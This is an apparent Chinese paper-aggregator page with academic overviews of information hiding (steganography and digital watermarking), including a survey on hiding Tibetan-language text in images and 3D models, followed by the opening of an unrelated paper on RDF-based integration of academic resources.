欢迎访问发表云网!为您提供杂志订阅、期刊咨询服务!

隐藏技术论文大全11篇

时间:2022-08-18 04:17:50

绪论:写作既是个人情感的抒发,也是对学术真理的探索,欢迎阅读由发表云整理的11篇隐藏技术论文范文,希望它们能为您的写作提供参考和启发。

隐藏技术论文

篇(1)

多媒体技术和通信技术带来极大方便,但数字化的多媒体信息很容易受到非法访问、篡改、复制和传播,给人们的生产生活及生命财产带来隐患。魔高一尺道高一丈,信息隐藏技术应运而生。

一、信息隐藏技术及其特征

信息隐藏技术利用载体数据的冗余性以及人的感官局限性,将一个特定信息隐藏在另外一个被称为载体的信息中。信息隐藏技术融合电子工程、计算机科学、信号处理、通信、多媒体技术等多学科,是新兴技术体系。信息隐藏所用载体可以是文本、图像、音频、视频,甚至可以是某个信道或某套编码体制。信息能够隐藏在载体中,载体数据本身具有很大的冗余性,未压缩的多媒体信息编码效率是很低,将某些信息嵌入到该载体信息中进行秘密传送完全可行,不会影响多媒体信息本身的传送和使用;人的感觉器官对于所接收信息都有一定掩蔽效应,如人耳对不同频段声音敏感程度不同,可将信息隐藏到载体中而不被觉察。

信息隐藏技术的特征明显:不可察觉性,嵌入信息后,要求不会引起载体发生可感知变化;不可检测性,嵌入隐藏信息后,计算机不能发现和检测;安全性,嵌入信息后,必须拥有相关信息才能够提取所嵌入内容;纯正性,提取操作时,即便载密文件受到损压缩、解压缩、滤波、转换等扰动,也能提取隐藏信息;稳定性,隐藏信息能“永久”存在;安全性,第三方在不知道隐藏算法和隐藏密钥情况下,不能获取信息相关数据。信息隐藏技术按载体分为,基于文本、图像、音频、视频、超文本、网络层、图形等媒体的信息隐藏技术;按嵌入域分为基于空域(或时域)和变换域的隐藏技术;按嵌入策略分为替换调制、模式调制和扩频叠加调制等技术;按提取要求分为盲隐藏技术和非盲隐藏技术;按作用分为隐蔽通信和数字水印技术;按密钥分为无密钥隐藏和有密钥隐藏。

二、信息隐藏技术的研究及演进

信息安全事关个人利益,也事关国家安全、社会稳定以及经济发展,各国政府无不重视信息和网络安全。密码技术一直是保障信息安全的重要手段,但这并不能解决问题。截获者发现网络文件加密,往往会引起注意,并激发其破解欲望,即使不能成功破解,也能轻易拦截并破坏秘密信息,干扰通信进行。针对密码技术的局限性,上世纪90年代国际上出现了信息隐藏技术(InformationHiding)。

现代信息隐藏研究主要集中在静态图像领域,目前信息隐藏所用载体已扩展到文字、图像、声音及视频等领域。在全球信息化、数字化迅猛发展时代背景下,对知识产权保护、隐密通信等需求激发了对信息隐藏技术的研究热潮。国际上研究信息隐藏的机构主要有剑桥大学、麻省理工学院、NEC美国研究所、IBM研究中心等,已提出了一些优秀隐藏算法。我国于1999年在何德全、周仲义、蔡吉人等三位院士大力倡导下召开了第一届信息隐藏学术研讨会,我国对信息隐藏的研究也取得重要成果。目前在信息隐藏中无论是数字水印还是隐密通信,都得到越来越广泛应用。应用领域不断扩大,从最初静态图片发展到文本、音频、视频、电脑文件、流媒体、网页及网络传输中的数据包,甚至是无线通信领域中的语音通信和手机彩信等领域。我国对信息隐藏的研究取得了很多成果,基本与世界水平保持一致。如今信息隐藏研究已出现百花齐放、百家争鸣局面。

三、信息隐藏技术的应用

随着信息技术飞速发展,人类利用的信息越来越丰富,通信技术发展使人们能够方便、快捷、灵活地使用文本、语音、图像与视频等多种方式通信;各种数字化信息处理技术使得网络中传输任何类型的文件(如文本、图像、音频和视频等)都可被数字化,极大方便了对各种信息数据压缩、存储、复制、处理和利用。

信息隐藏技术主要有隐写术和数字水印。目前,信息隐藏技术的应用主要在以下方面:一是隐密通信。通过隐写术将秘密信息嵌入在公开媒体文件中传播消息。早期的隐密通信,接收方和发送方甚至不必交换电子邮件,直接交互文件或登录特定计算机和账户。随着网络及通信技术发展,隐密通信所用通信方式从简单数据文件交互到互联网以及无线通信领域。二是版权保护。通过数字水印技术在媒体文件中嵌入特定数字标识或签名,标识媒体文件所有权和版权信息等。三是数据完整性保护。防护篡改、完整性保护中所采用的数字水印为易损水印或脆弱水印,任何对媒体文件修改都会从隐藏数据中反映出来。四是印刷品防伪。印刷品印刷之前嵌入一定标识信息,印刷后作品可经过扫描再次输入计算机,通过特定水印提取和鉴别方法来鉴别作品真伪。五是拷贝控制。控制媒体文件拷贝次数,防止大规模盗版或非法复制。

信息隐藏技术重点运用领域是移动通信领域。移动通信网络方便快捷,在军事和商业通信中广泛应用。移动通信领域多媒体短信将文本、图片、音频、视频等组合成多媒体消息进行发送。移动通信领域中多媒体短信以其特有的直观性、生动性和集成性,面市以来得到广泛关注。多媒体短信即彩信的最大特色是支持多媒体功能,可将不同的媒体,如文本、图片、音频、视频等组合在一起进行发送。彩信标准并没有对彩信所支持的文件格式给出具体限制,理论上只要在封装打包时为彩信所包含的各媒体文件设置好适当类型参数即可;但实际上具体的彩信所支持媒体格式还是有限的,这主要与手机终端彩信软件和MMSC支持传送媒体格式有关。随着3G普及以及手机终端行业发展,彩信所支持的媒体文件格式将更丰富多样,为信息隐藏技术在彩信中的应用提供了更为广阔的空间。

【参考文献】

篇(2)

中图分类号:TN401 文献标识码:A 文章编号:2095-1302(2014)12-00-05

0 引 言

安全、有效的信息传输对国家安全、社会稳定和人民安居乐业至关重要。网络和多媒体技术的发展,使得信息传输的速度和数量正以惊人的增量发展。然而,信息传输的便利在方便人们的同时也给信息安全带来了隐患,同时也为基于数字载体的秘密信息传输提供了广阔的研究空间。目前,基于载体的秘密信息传输是信息安全领域的一个方兴未艾的研究热点。而基于载体预处理的藏文信息隐藏技术将为信息安全领域提供一些新的数字信息共享和传输理念,特别是藏文的预处理规律、在数字信息中的隐藏规律等,将有助于涉藏秘密通信技术的发展,并可以对民用和商用领域中涉及到藏文内容的传输、共享、存储和提取的通信过程起到安全保护、版权保护及完整性认证的作用,并对国家涉藏领域的网络舆情监控、国内外涉藏敏感信息标注和情感色彩认知起着至关重要的作用。

在藏文信息隐藏技术方面,目前主要涉及的技术有关键字识别、字符识别和提取、韵律认知、语义角色标注、文本资源挖掘和语料抽取等,并以此为基础进行置乱优化。

1 国内外信息隐藏技术研究现状

信息隐藏一直是信息安全领域中保障隐秘信息安全传输和数字信息版权的重要手段,也是近年来国内外学者研究的热点之一。最新的一届ACM信息隐藏和多媒体安全会议(ACM IH&MMSec’13 Workshop)的主要研究内容有信息隐藏算法、多媒体水印和认证、载体运算域的数字信号处理等。其中,信息隐藏算法的设计首先依赖于载体的选择和预处理;关于多媒体水印和认证的研究则将信息隐藏和数字水印的载体范围从数字图像等常见载体拓展到了包括三维模型在内的新型载体上;载体运算域的数字信号处理涉及到了载体预处理时所用的具体方法,如空间域或变换域等。2013年IEEE 图像处理国际会议(IEEE ICIP 2013)的主要研究内容包括图像、音视频和3-D等多媒体的信息隐藏算法和多媒体特征提取和分析等,这两类研究内容均与载体的选取和预处理有关。最新一届信息隐藏国际会议(IH2012)的主要研究内容包括多媒体安全和其他载体的信息隐藏。我国的第十一届全国信息隐藏暨多媒体安全学术大会(CIHW2013)中关于信息隐藏算法的研究内容也主要集中在非常规载体的分析和预处理上。

藏文作为信息隐藏领域一种新的信息格式,对其研究主要局限于藏文操作系统、藏文信息技术标准、藏文信息处理等几个方面[1],具体内容集中在藏文编码字符集、术语集、拼音辅助集等的建立。

基于载体的秘密通信技术是20世纪90年代中期发展起来的跨领域的学科,而载体的预处理技术一直是其研究的主要方向。对隐藏载体进行预处理,生成信息隐藏嵌入区域是信息隐藏算法中最重要的研究内容之一。从上述国内外各学术会议中关于信息隐藏的参会论文和研讨情况看,各类载体固有特性的研究对预处理技术有着重要的意义,且数字图像依然是主要的一类载体,而三维模型将是未来主要研究的一类非常规载体。下面就对数字图像和三维模型两类载体的预处理技术的研究现状进行阐述。

1.1 数字图像预处理技术研究综述

基于数字图像的信息隐藏技术是信息隐藏学科中重要的技术分支,是目前应用最广、覆盖范围最大的信息隐藏技术手段。在基于数字图像的信息隐藏技术研究中,信息隐藏区域的生成是关系算法性能的重要因素。信息隐藏区域的生成方法主要包括空间域生成法、变换域生成法以及空间域和变换域联合的生成方法。

空间域算法:作为空间域算法中出现最早、操作最简单且应用最广泛的算法,基于位平面分解理论的LSB算法可以直接替换的方式隐藏较大的数据量,刘红翼等提出的一种LSB算法具有容量大、运算量小的特点[2];刘文彬等提出的LSB隐写替换的消息定位方法则可以对此类算法进行检测[3];而IH2012的论文中,有学者运用假设检验理论和含秘载体的奇偶感知特性可有效地检测LSB算法所隐藏的隐秘信息[4,5],这些研究为藏文信息隐藏中涉及到关于此类算法的抗检测性研究提供了新的待改进方向。张焱等提出的像素值排序和赵彦涛等提出的直方图修改等空间域算法在沿用LSB直接替换的隐藏理念的同时,还提升了鲁棒性,因此也被广泛用于数字图像载体预处理[6,7];随后,杨春芳等提出了针对此类算法的检测方法[8],这也为针对此类算法抗检测性改进的研究提供了重要依据。此外,上述同类算法中的载体子区域划分思想、内容自适应思想等也对本项目基于载体结构特性建立空间匹配模型的机制提供了方法学上的有力支持[9-13]。

变换域算法:不同于空间域算法直接对载体的空间特性进行修改,变换域预处理方法以修改载体的频率参数来隐藏信息[14],因此算法的鲁棒性比空间域算法好。在此基础上,唐燕等又对隐秘信息的检测和恢复进行了研究和改进,实现了几乎无需原始参量的半盲提取[15]。尽管变换域算法不具备空间域算法容量大、运算量小和易操作等优势,但是变换域中的多小波理论因其同时具有对称性、短支撑性、二阶消失矩和正交性等特性成为了信号处理中有明显优势且较常用的方法,在前期研究中利用多小波方法将数字图像载体分块后作为嵌入区域,提高了算法的鲁棒性和不可见性[16,17],这种方法为在藏文信息隐藏研究中建立基于区域能量的阶梯性分布机制提供了一种研究手段。

混合域算法:较单独运用一种空间域或变换域生成隐藏区域并设计信息隐藏算法来看,基于空间域与变换域联合的信息隐藏算法可以兼有多种算法的性能优势。在基于空间域和变换域联合的信息隐藏算法中,空间域的作用体现在数据嵌入的具体操作方面,因为隐藏的实质就是在当前环境下的空间分量上进行数据修改,利用边缘像素值差分(Edged Pixel Value Differencing,EPVD)将载体换算为若干个像素块,以最大斜角的数据修改作为信息隐藏的具体方法[18];利用湿纸码和基于LSBM的双层隐写来对载体进行加1嵌入或减1嵌入[19];另外,国内外许多学者利用调色板理论进行数据嵌入[20,21]。而变换域在载体预处理中的主要作用是生成满足特定需要的信息隐藏环境(区域),主要包括变换后的系数分布以及n阶分量子图等。如对RSV颜色空间的V分量做DCT变换,分块后作为嵌入区域[22];利用视觉显著点技术确定跟踪窗(Regions of Interest,ROI),在ROI的DCT系数上嵌入隐藏信息,并指定某个ROI边缘地图脆弱性标识,嵌入到DWT变换后的含密图像中[23];前期研究中,研究人员利用自适应颜色迁移理论中lαβ域对颜色的控制力,消除了RGB颜色分量的强相关性,并结合GHM能量分区隐藏信息,在不可见性、嵌入信息量和鲁棒性方面均具有较好的表现[24]。

1.2 三维模型预处理技术研究综述

潘志庚等将基于三维模型的信息隐藏预处理方法主要分为空间域算法和变换域算法[25]。这也这为藏文信息隐藏研究提供了新的思路和方法。

空间域算法:空间域算法通常具有易嵌入和盲提取的特点,如直接置换载体的几何信息来隐藏数据是三维模型载体信息隐藏最原始、最直接的方法[26]。为改进此类算法的鲁棒性,引入仿射不变量是有效的措施,如利用具有连续解析性的仿射不变量优化需要置换的顶点[27]、 将稳态锚点通过三角垂心编码解析为聚类元素从而嵌入隐秘信息[28]。此外,基于主元分析的算法也有助于改善空间域算法的鲁棒性,例如可根据主元分析(Primary Component Analysis,PCA)来确定模型的关键位置作为鲁棒区域,并用网格分割法改进鲁棒性和不可见性[29-32]。这类算法也为藏文信息隐藏从载体结构特性进行解析和预处理提供了理论依据。改进型的空间域算法多针对鲁棒性或容量性有所提升,如基于连续解析性的体积矩的盲算法,改善了之前算法对连通性攻击的鲁棒性[33];通过重排顶点和面片在网格文件中的表示信息,利用表示域内的信息进行嵌入使算法具有良好的不可见性和大容量性[34],但对相似变换以外的攻击不具有鲁棒性。

变换域算法:三维模型预处理的变换域方法大多利用频谱分析将模型信息参数化[35],对参数进行少量修改后以隐藏信息,其中,基于小波变换的算法可以对规则和非规则网格模型进行小波域参量修改以嵌入较多信息[36]。理论上,变换域算法比空间域算法鲁棒性强,但由于三维模型顶点的天然无序性和不规则性,对其进行频谱分析难度大,导致变换域算法实用性目前较低,因此空间域算法依然是比变换域算法更有实用价值的研究方向[37]。

2 藏文信息隐藏技术研究现状

目前反映藏文信息处理技术最新进展的文献较少,综合以已有的研究成果及相关研究文献,藏文信息处理可划分为藏语信息处理和藏字信息处理两个层次[38,39]。藏语信息处理包括机器翻译、信息检索、信息提取、文本校对、文本生成、文本分类、自动摘要以及藏文字识别和语音识别的后处理等等;而藏字信息处理包括操作系统以及编码字符集、输入技术、字形描述与生成、存储、编辑、排版、字频统计和藏字属性库等。这些研究基础对藏文信息隐藏技术的发展至关重要,是基于载体预处理的藏文信息隐藏的主要技术来源。鉴于藏文的独特构造,以及藏文的特点,目前对藏文秘密信息的预处理技术一般指置乱和加密算法的选择[40],而置乱使信息变得杂乱无章难以辨认,可以起到加密与改变信息嵌入特性的作用。可用于藏文信息隐藏的置乱算法主要有Arnold变换、幻方矩阵、Gray码变换、混沌序列等方法[41]。其中,Arnold变换算法简单且置乱效果显著,使有意义的数字图像变成像白噪声一样的无意义图像,实现了信息的初步加密和信息结构的调整,在嵌入信息为数字图像时可以很好的应用[42]。幻方置乱的思想基于查表思想,基于数字图像的幻方置乱可降低幻方置乱阶数或以图像块进行置乱,实现置乱效果与系统开销的平衡[43]。Gray是一种具有反射特性和循环特性的单步自补码,它的循环、单步特性消除了随机取数时出现重大误差的可能,它的反射、自补特性使得求反非常方便[44]。混沌的优势在于对初始条件的极端敏感和轨迹在整个空间上的遍历性。根据经典的Shannon置乱与扩散的要求,这些独特的特征使得混沌映射成为信息隐藏嵌入算法的优秀候选[45]。上述传统的置乱算法一般用于正方形图像处理,而经过改进的Arnold算法可直接用于宽高不等的矩形图像而不必进行正方形扩展[46],这也将是藏文信息隐藏技术所采用的主要置乱方法之一。

3 藏文信息隐藏技术的研究目标、研究内容和要解决的问题

3.1 研究目标

面向藏文安全通信的高性能信息隐藏算法是目前藏文信息隐藏技术的主要目标,包括提出性能出色的、适合藏文通信要求的信息隐藏算法;提出一种具有普适性的高性能信息隐藏嵌入区域生成原则和嵌入规则:

(1) 基于数字图像的藏文信息隐藏算法:提出至少两种基于数字图像的藏文信息隐藏算法,算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(PSNR≥34.90dB)、强鲁棒性(抗击大约69%以下的JPEG2000压缩、35%以下的剪切及常见滤波与加噪)、大容量性(基于彩色图像的信息隐藏信息嵌入率≥18%)以及高感知篡改性(检测隐藏数据是否被篡改能力≥95%)。

(2) 基于三维模型的藏文信息隐藏算法:提出至少一种基于三维模型的藏文信息隐藏算法。算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(RSNR≥69.94dB、En≥70%)、应对一般攻击的强鲁棒性(抗击大约0.10%随机加噪、50-times Laplacian平滑、50%均匀重网格化以及均匀简化等)、大容量性(相对理想的RSNR,嵌入率≥29%)以及低复杂度(根据载体模型几何信息量而变化)。

(3) 普适性信息隐藏嵌入区域生成原则和嵌入规则:利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则,将适应于所有对数字图像处理后有能量区别的图像处理方法,指导设计者利用能量与鲁棒性、复杂度与不可见性的对应关系,研究出同时满足不可见性和鲁棒性的信息隐藏算法。

3.2 研究内容

(1) 藏文信息隐藏区域生成原则与规则研究:数字图像信息隐藏技术的研究核心集中在隐藏区域和嵌入规则的设计上,藏文信息隐藏算法的设计方法和思路就是在选定藏文信息隐藏区域以及制定好信息隐藏规则后,按照一定的顺序将两者进行合理的组织,所以研究藏文信息隐藏区域生成原则以及信息隐藏规则是重点。

(2) 基于数字图像的藏文信息隐藏算法研究:隐藏算法是基于数字图像的信息隐藏技术的研究核心,需按照嵌入域进行划分,对基于空间域和基于变换域的信息隐藏算法分别进行研究,提出单独基于空间域、单独基于变换域以及两者联合应用的数字图像信息隐藏算法。

(3) 基于三维模型的藏文信息隐藏算法研究:首先对三维模型的结构特性和能量特性进行研究,再根据载体模型的特性找出对应的预处理方法。在研究基于空间域和基于变换域的信息隐藏算法的基础上,提出改进型的三维模型信息隐藏算法。主要用于提升载体有效嵌入容量和降低载体视觉失真度。

(4) 载体与藏文秘密信息的一致化方法研究:基于上述研究基础,生成结构和能量差异化子区域,再将藏文秘密信息按照拼音属性进行解析生成信息序列。再利用优化算法使得预处理后的载体信息和藏文秘密信息的解析编码获得最大一致化,从而提高算法性能。

3.3 需解决的关键问题

综合已有的研究,在藏文信息隐藏技术方面,目前需要解决的问题有以下几个方面:

(1) 信息隐藏区域与嵌入规则设计:在具有什么性质的区域内应用什么样的规则进行藏文信息隐藏才可以解决“不可见性与鲁棒性的对立、容量性与抗分析性的对立”问题,是藏文信息隐藏研究领域的关键技术之一。需找出隐藏区域的性质与信息隐藏性能的关系,提出面向藏文信息传输的信息隐藏区域选择的原则与方法;给出在具有具体性质的嵌入区域中的藏文信息隐藏嵌入规则的制定原理和方法;提出大量的藏文信息数据转换思想与方法,以提供形式多样的信息隐藏嵌入规则。

(2) 数字图像载体预处理方法:①多小波理论在载体预处理中的应用。对于数字图像经过多小波变换后所具有的特殊性质,找出多小波变换后数字图像所具有的能量特性与基于数字图像信息隐藏算法性能之间所遵循的规律已有学者进行研究。②颜色空间的性能分析与应用选取。RGB、CMYK、lαβ、YUV以及HSx颜色空间,应用方法以及应用各有优劣势。该技术的应用难点在于为颜色空间在藏文信息隐藏的应用提出完备的应用方案,因为这些颜色空间在藏文信息隐藏技术中的应用目前非常少,应用优劣还处于实验验证阶段,没有理论验证的支持。

(3) 三维网格模型载体预处理方法:骨架抽取和内切球解析技术在藏文信息隐藏算法中的应用。这种方法不涉及顶点数量及坐标的改变和拓扑关系的修改。难点在于寻找一个理想的仿射不变量作为辅助参数以弥补算法对缩放攻击的脆弱性。

(4) 藏文的置乱与遗传优化算法:有的藏文字处理系统把藏文看成是由30个辅音、4个元音、3个上加字、5个下加字共42个藏文字符组成的,而有的则认为由其他数量的字符组成。基于对藏文中加字对发音的影响规律的研究,利用字符与二进制码的解析规则和置乱与优化技术对信息置乱,达到隐藏信息与载体信息的最大匹配度也是一个技术难点。

4 藏文信息隐藏技术研究的新方法

(1)利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则。高能量与强鲁棒、高复杂度与高不可见性的对应关系,从根本上解决藏文信息隐藏算法中不可见性和鲁棒性的对立问题,为面向藏文通信安全的信息隐藏算法的设计给出一种普适性方法。

(2)根据数字图像信息隐藏嵌入区域的生成原则和嵌入规则,提出新的、高性能的数字图像的藏文信息隐藏算法。算法利用lαβ等颜色空间转换以及多小波对载体图像进行的处理,生成具有不同能量特性的嵌入区域,从频率域上满足藏文信息隐藏的应用要求;通过对载体图像进行颜色迁移、矢量解析以及环形处理,从数字图像的空间结构上满足藏文信息隐藏的应用要求。

(3)提出满足三维模型结构特性和能量特性的藏文信息隐藏算法。算法利用局部高度理论和均值偏移理论对载体模型进行预处理,生成具有不同能量特性的嵌入区域,从频域上满足信息隐藏的应用要求;通过对载体图像进行骨架抽取、内切球解析,从空间结构上满足藏文信息隐藏的应用要求。

参考文献

[1]陈玉忠,俞士汶. 藏文信息处理技术的研究现状与展望[J]. 中国藏学. 2003(4):97-107.

[2]刘红翼,王继军,韦月琼,等.一种基于LSB的数字图像信息隐藏算法[J].计算机科学,2008, 35(1):100-102.

[3]刘文彬,刘九芬.一种针对LSB替换隐写的消息定位方法[J].信息工程大学学报,2013,14(6):641-646.

[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.

[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.

[6] 张焱,张敏情,瓮佳佳.基于直方图对的大容量信息隐藏算法[J].计算机应用研究,2013,30(7):2108-2111.

[7] 赵彦涛,李志全,董宇青.基于排序和直方图修改的可逆信息隐藏方法[J].光电子.激光,2010,2(1):102-106.

[8] 杨春芳,刘粉林,罗向阳.基于相对熵的直方图差异与JPEG隐写的定量分析[J].计算机研究与发展, 2011,48(8):1563-1569.

[9] 熊志勇,王江晴.基于差分直方图平移的彩色图像可逆信息隐藏[J].四川大学学报,2011,43(3): 81-89.

[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.

[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.

[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.

[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.

[14]和红杰,张家树.对水印信息篡改鲁棒的自嵌入水印算法[J].软件学报,2009,20(2):437-450.

[15] 唐燕,闾国年,殷奎喜.规范类正交矩阵的信息隐藏算法[J].东南大学学报,2013,43(1):45-49.

[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.

[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.

[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.

[19] 奚玲,平西建,张韬.整数小波域湿纸码自适应信息隐藏算法[J].计算机辅助设计与图形学学报,2011,2(7):1217-1223.

[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.

[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.

[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.

[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.

[24] 任帅,张|,慕德俊,等.基于GHM多小波与自适应颜色迁移的信息隐藏算法研究[J].西北工业大学学报,2010,28(2):64-269.

[25] 潘志庚, 孙树森, 李黎.三维模型数字水印综述[J].计算机辅助设计与图形学学报,2006,18(8):1103-1110.

[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.

[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.

[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.

[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.

[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.

[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.

[32] 廖学良,王屏.一种新的三维模型水印嵌入空域算法[J]. 计算机学报,2008, 31(10): 1848-1856.

[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.

[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.

[35] 胡敏,刘辉.基于特征点的自适应三维网格数字水印算法[J].合肥工业大学学报(自然科学版),2010,33(1):55-59.

[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.

[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.

[38]陈力为. 中文信息处理丛书序言[M].北京:清华大学出版社,2000.

[39]俞士汶,朱学锋,贾玉祥. 汉语隐喻自动处理研究之概况[C].第四届文学与信息技术国际研讨会,2008.

[40] 谭良,吴波,刘震,等.一种基于混沌和小波变换的大容量音频信息隐藏算法[J].电子学报,2010,38(8):1812-1819.

[41] 丁玮,闫伟齐,齐东旭.基于置乱与融合的数字图象隐藏技术及其应用[J].中国图象图形学报,2000,5(8):644-649.

[42] 田云凯,贾传荧,王庆武.基于Arnold变换的图像置乱及其恢复[J].大连海事大学学报:自然科学版,2006,32(4):107-109.

[43] 彭万权,张承畅,冯文江,等.多阶幻方卷积码的构造及译码[J].电子学报,2013,41(1):123-130.

篇(3)

中图分类号:TP391文献标识码:A文章编号:1009-3044(2012)09-1985-03

An RDF-based Integration Model of Academic Resources

YAO Jin-feng1, CHEN Lei2

(1.School of Computer Science and Engineering, Anhui University of Science and Technology, Huainan 232001, China; 2.Department of Computer and Information Engineering, Huainan Normal University, Huainan 232038, China)

Abstract: Resources like papers or thesises can be abstraced as knowledge base. After analysed, we find it is appropriate to describe the Web objects of the academic resources using the Resource Description Frame(RDF) statements, and also, we can create the academic ontology with OWL. This paper proposes a mechamism of the semantic query and logical inference, deploys a academic resource knowledge discovery system which has the characters of the Semantic Web, and it will faciliate the user query and the management.

Key words: semantic web; RDF; academic resources; ontology

1概述

对于高校的教师和学生而言,论文之类的学术资源是一种从事学习和科研的重要知识资源,对它们的搜索与发现也是教师和学生的知识获取的重要手段。为了帮助用户的搜索,各高校和一些相关机构都推出了一些论文查询机制(如万方、维普等),极大地方便了相关人群的使用。

论文资源的组织本质上属于知识管理工程。知识管理所关注的是在一个组织中获取、处理和维护知识。对于大型论文资源库而言,有效地进行知识管理,在机构内部实施先进科学的知识组织与维护方式,对外则提供高效、高质量的用户查询(咨询)服务则是相关机构创造新的价值和增强竞争力的有效保证。目前大多数可用信息只具有弱结构组织形式,从知识管理的角度来说,现有技术存在以下诸方面的局限[1]:

1)信息搜索。当今的互联网通常依靠基于关键词的搜索引擎,这使得搜索的结构总是“高匹配、低精度”,而且从搜索结果的形式来看,总是单一的网页,如果所需要的信息分布在不同的文档中,则用户必须给出多个查询来收集相关的页面,然后自己提取这些页面中的相关信息并组织成一个整体。

2)信息抽取。需要人工浏览搜索的文档,当前的信息组织形式还不能满足智能软件(Intelligent Agent)的要求。

3)信息维护。比如术语的不相容性和无法移除过时的信息等。

4)信息挖掘。虽然可以用数据挖掘(Data Mining)等手段提取隐藏在信息数据库中的新知识,但对于分布式的、弱结构化的文档集合,这个任务仍然是困难的。

5)信息视图。经常需要限制某些用户对某些信息的浏览权限。“视图”意味着隐藏某些信息,在传统数据库中很容易做到这一点,但对于论文资源服务网站来说尚难以实现。

基于本体的论文资源语义网的研究的主要目的就是解决上述问题,并借助于自动推理机从给定的知识演绎出一些结论,从而使隐含的知识外显出来,并以期通过相应的(Agent)收集和整理信息,为用户提供备选方案。

2语义Web技术基础

语义Web研究的重点就是如何把信息表示为计算机能够理解和处理的形式,即带有语义。它主要基于XML和RDF/RDFS[2],并在此之上构建本体和逻辑推理规则,它完全基于语义的知识表示和推理,从而能够为计算机所理解和处理。

语义网的核心是本体。R.Studer给本体的定义是“一个本体是一个概念体系(Conceptualization)的显式的形式化规范”[3]。一个典型的本体由有限个术语以及它们之间的关系组成。术语(Term)指给定论域中的重要概念(如对象和类)。例如,以论文资源为例,标题、关键字、主题、作者等,都是术语。本体中概念之间的关系通常包括类的层次结构。除了子类关系外,本体还可以包括以下信息:属性、值约束、不相交描述和对象间逻辑关系的规定等。语义网通过网络本体语言来定义本体,以本体清晰明确地表达各种词汇集和网络上的不同数据资源间的语义关系,从而在网络上实现不同词汇集和数据资源间的共享以及基于网络的语义查询和推理。因此,在Web中,本体提供了对给定领域的一种共识,这种共识对于消除术语差别是必要的。本体尤其可以用于提高网络搜索的精确度,这是因为搜索引擎可以精确地根据本体中的概念查找相关页面,而不是收集所有出现某些关键词的页面,这样就保证了查询的结果。另外,可以利用本体在网络搜索中试探更一般或更特殊的查询。如果一个查询失败了,没有找到相关文档,看见过引擎可以向用户推荐更一般的查询。甚至可以考虑让搜索引擎主动执行这样的查询。

W3C推荐标准是RDF(Resource Description Framework)[2]。它实际上是一个数据模型(Data-Model)。它由一系列陈述(Statement)即“对象-属性-值”三元组,由此,RDF的数据模型可以很方便地描述对象以及它们的关系。实际上,RDF只提供二元谓词(属性)。由于任何复杂的关系都可以分解为多个二元关系,因此RDF的数据模型可以作为其他任何复杂关系模型的基础模型。通过RDF,可以将基于关键词的检索更容易地推进到基于语义的检索。

